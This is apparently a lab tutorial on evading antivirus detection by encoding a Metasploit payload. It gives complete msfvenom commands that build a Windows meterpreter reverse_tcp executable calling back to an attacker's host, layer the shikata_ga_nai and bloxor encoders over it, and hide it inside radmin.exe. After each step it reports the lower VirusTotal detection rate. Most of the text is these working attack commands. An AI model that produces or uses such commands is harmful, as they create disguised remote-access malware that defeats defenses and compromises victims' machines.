Encoders are tools that allow you to avoid characters in an exploit that would break it. Encoders mangle the payload and prepend decoding instructions to be executed in order to decode the payload before it run. Thus encoders can be used to bypass antivirus programs.

Some encoders create polymorphic code or mutating code that means the encoded payload looks different every time. Hence, it is difficult for antivirus programs to detect (as signature or pattern is different every time).

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

In Kali Linux --> Terminal

1. Now let’s try to create an exe file using above encoder.

~# msfvenom –p windows/meterpreter/reverse_tcp LHOST = [IP address of attacker system] LPORT = 1337 –e x86/shikata_ga_nai –i 10 –f exe > [filename.exe]

Here,

-e --> encoder

x86/shikata_ga_nai --> encoder used

-i --> iteration

10 --> count for iteration (it can be changed as per need)

-f --> output file type

exe --> output file format

[filename.exe] --> output exe file to be created

If this exe file is tested against virustotal, around 41/57 (numbers may change) antivirus detect it as malicious exe file.

Note: ‘shikata-ga-nai’ is the only encode with excellent rank.

2. To reduce this count further we can use more than 1 encoder as follows:

Here we will use two encoders as shikata_ga_nai and bloxor.

~# msfvenom –p windows/meterpreter/reverse_tcp LHOST = [IP address of attacker system] LPORT = 1337 –e x86/shikata_ga_nai –i 10 –f raw > [filename.bin]

Here,

raw --> output file format

[filename.bin] --> output raw file to be created

Now this raw file is again encoded with bloxor encoder.

~# msfvenom –p - -f exe –a x86 –platform windows –e x86/bloxor –i 2 [newexefile.exe] < [filename.bin]

Here,

-p --> payload

- --> no payload used

-a --> architecture

x86 --> architecture value

--platform --> platform

windows --> platform value

x86/bloxor --> encoder to be used

i --> iteration

2 --> count for iteration

[newexefile.exe] --> new exe file to be created

[filename.bin] --> bin file in raw format created in previous step

If you test this exe against virustotal, around 36/57 (numbers may change) antivirus programs detect it as a malicious. This value is slightly lesser that previous step.

3. To reduce the detection rate even further, we can use two techniques combined i.e. fusing exe and using encoders as follows:

~# msfvenom –p windows/meterpreter/reverse_tcp LHOST = [IP address of attacker system] LPORT = 1337 –x /usr/share/windows-binaries/radmin.exe –k –e x86/shikata_ga_nai –i 10 –f exe > [newexefile.exe]

Now this file is detected as malicious file by 29/57 (numbers may change) antivirus programs at virustotal, which is even lesser that in previous step. But Microsoft Security Essential still detects it. Thus we can reduce the detectability by combining more encoders and fusing with other exe’s.